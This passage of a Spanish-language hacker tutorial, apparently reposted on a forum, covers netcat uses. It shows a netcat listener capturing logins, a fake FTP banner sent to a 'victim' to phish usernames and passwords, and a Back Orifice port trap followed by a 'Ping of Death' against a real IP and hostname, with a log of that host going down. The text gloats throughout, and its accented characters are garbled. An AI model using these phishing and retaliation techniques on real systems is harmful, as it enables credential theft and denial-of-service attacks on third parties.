que es usada para scanning, los puertos se lo especificamos al final del
IP del host, bien sea individuales separados por un espacio; o por un
rango de puertos.


Sniffer:
========

Otra de las interesante posibilidades de netcat es su capacidad para
escuchar conecciones en cualquier puerto, pudiendo redireccionar todo el
tr?co del mismo hacia un archivo o hacia pantalla, en este sencillo
ejemplo, podemos observar las bases de un sencillo sniffer en Windows:

C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!
puedo ver todo lo que escriben aqui... Muuuaaahahahahahah!!! B-]


Tambien podemos redireccionar toda la salida a un archivo e
irnos a realizar otras actividades ,ientras netcat hace su trabajo:

C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...

[Aqui viene la conneci??.]

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1030

[Todo lo que escriba la connecci??e va al archivo login.txt]
sent 0, rcvd 42

[La opci??L permite que netcat escuche nuevamente al terminar la conecci??
"New Victims Wanted" Hehe!]

DNS fwd/rev mismatch: localhost != darkstar
listening on [127.0.0.1] 23 ...




El Exploit-Explained: nc -v -v -L 127.0.0.1 -p 23
---------------------

Ejecutamos a Netcat con la opci?? variable -v (verbose)
(doblemente "verbose" por si acaso)  esto har?ue el resultado de
netcat, sea mostrado directamente en pantalla (a diferencia del archivo
usado por Dr._X) , la opci?? variable -L (Listen, and listen again)
nos permitir?ejar escuchando u "oliendo" en determinado puerto aun
cuando la conecci??ea interrumpida (listen again), con la variable -p
le indicamos el puerto...

Al ejecutar a netcat con esa combinaci??e variables las
opci??v me indica en pantalla el Host y el puerto de escucha:

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...


Realizo desde otra ventana un telnet a localhost (127.0.0.1) en
el puerto 23, netcat me informa sobre lo que ocurre en el puerto 23:

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado


Voil?un Sniffer en LocalHost! Jajaja!!!



Detector de Conneciones Sospechosas:
====================================

La posibilidad de dejar a netcat escuchando en determinados puertos,
nos permite crear una especie de "trampa" para un supuesto agresor que utilize
scanners, o herramientas tales como NetBus o BackOrifice en contra de
nuestras estaciones. Incluso, podemos crear un archivo que haga un Flood
y redireccionar su salida hacia la estaci??gresora en caso de una conecci??br />no autorizada a determinado puerto. (jeje! y se me ocurren un monton de cosas
m? Muaahahaha!)

Este es un ejemplo de un detector de BO, Je! y funciona! este es un ejemplo
real de un dia como cualquier otro en IRC; he aqu?l ejemplo:

C:\nc11nt>nc -u -v -v -L -p 31337 127.0.0.1 31337
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 31337 ...

invalid connection to [0.0.0.0] from nas1-064.ras.bqm.cantv.net
[161.196.246.65]
31338

Back Orifice utiliza el protocolo UDP para realizar sus
travesuras, realiza la conecci??esde un puerto aleatorio (casi siempre
el 1080) aunque en este caso lo hizo desde el 31338 (posiblemente una
variante de BO), por eso se utiliza la opci??u (protocolo udp) ,
netcat se queda esperando conecciones UDP en el puerto 31337 (default de
BO) , cuando alguien hace un sweep a tu IP netcat lo detecta enviando a
pantalla el IP y el DNS del agresor...

Luego un peque??quot;Ping of Death" (Nuke) para el transgresor y
le hacen un Scan para ver cuando desaparece B-]

nas1-064.ras.bqm.cantv.net [161.196.246.65] 48 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 47 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 46 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 45 (?): TIMEDOUT
nas1-064.ras.bqm.cantv.net [161.196.246.65] 44 (?): TIMEDOUT<--Chao!!! Jeje!!


Otros usos Miscelaneos:
=======================

Puedes utilizar algo de ingiener?social para capturar algunos
passwords con netcat, por ejemplo, si una m?ina no tiene abierto el
puerto de FTP o de telnet, creas un archivo de texto que solicite el ID
y el Password de la v?ima; algo as?

Microsoft Internet FTP Server V.5.9 [Beta]
04/16/99 myhost.com
Please introduce Username, password and press "Enter"
LogOn:

Luego redireccionas el archivo hacia la victima:

C:\nc11nt>nc -v -v -L -p 21 nombre del host -t < login.txt

Si el tonto cae... Ah?a tu password, Jeje!! B-] un poco de
imaginaci?? ma??e permitir?encontrar muchas utilidades para
netcat.


Netcat en Vez de Telnet.
=======================

Yo personalmente prefiero usar netcat para realizar connecciones
remotas como alternativa al Telnet. la ventaja de realizar conecciones telnet
desde netcat es que este esconde "algo" sobre tu conecci??lo que lo hace
mas "sigiloso" que telnet, (de ah?or que lo llamaron netcat), Realizando
una conecci??quot;Limpia" en determinado puerto, obviando las negociaciones
comunes de Telnet que pueden confundir al cliente en determinados casos,
como por ejemplo, al utilizar ciertas Backdoors muy conocidas en Unix.

OJO: algunas m?inas interpretan al cliente de telnet
y asumen el nombre del usuario que lo utiliza, de all?l porqu?lgunos
servidores solo preguntan por password ; teoricamente netcat no envia
esta informaci??Por eso, es recomendable acostumbrarse a utilizar netcat
para hacer conecciones remotas:


c:> nc -v nombre del host 23(o el puerto de tu preferencia)


Netcat y Programaci??
======================

Esta combinaci??esencadena todo el Poder de Netcat en su m?ma
expresi??Tratandose de una herramienta que funciona con lineas de comandos,
su integraci??on un lenguaje de programaci??e permite realizar gran
cantidad de tareas, y posibilidades se van descubriendo dia a dia con su
inclusi??n nuevos Scripts y Exploits.

Muchos ScriptKiddies que no tienen idea de lo que hacen, se sienten
frustrados porque muchos de los Scripts y Exploits que bajan de la Red
simplemente no les funciona, porque no saben interpretar el C??o y por
lo tanto son incapaces de efectuar las modificaciones necesarias para incluir
librerias, paths o utilidades necesarias para su funcionamiento.
(J??se ScriptKiddies!!! Jajaja!!)

Netcat es exelente para implementar exploits remotos, permitiendo
enviar el c??o a cualquier puerto vulnerable con una simple orden, logrando
ejecutar todos los comandos necesarios para explotar determinados servicios.

Varios exploits que circulan actualmente en la Red, usan a netcat
como "motor" para manejar las conecciones, si analizamos el c??o de estos
programas podemos observar un nc por ah?esto significa que el Proggie en
cuesti??ecesita una versi??orrectamente compilada de netcat en el
directorio /usr/bin

Si marco la fuente puede que os lo tomeis como SPAM, porque no creo que os guste el origen de este tutorial...
Bueno igualmente espero que os haya sido de utilidad
bueno
Salu2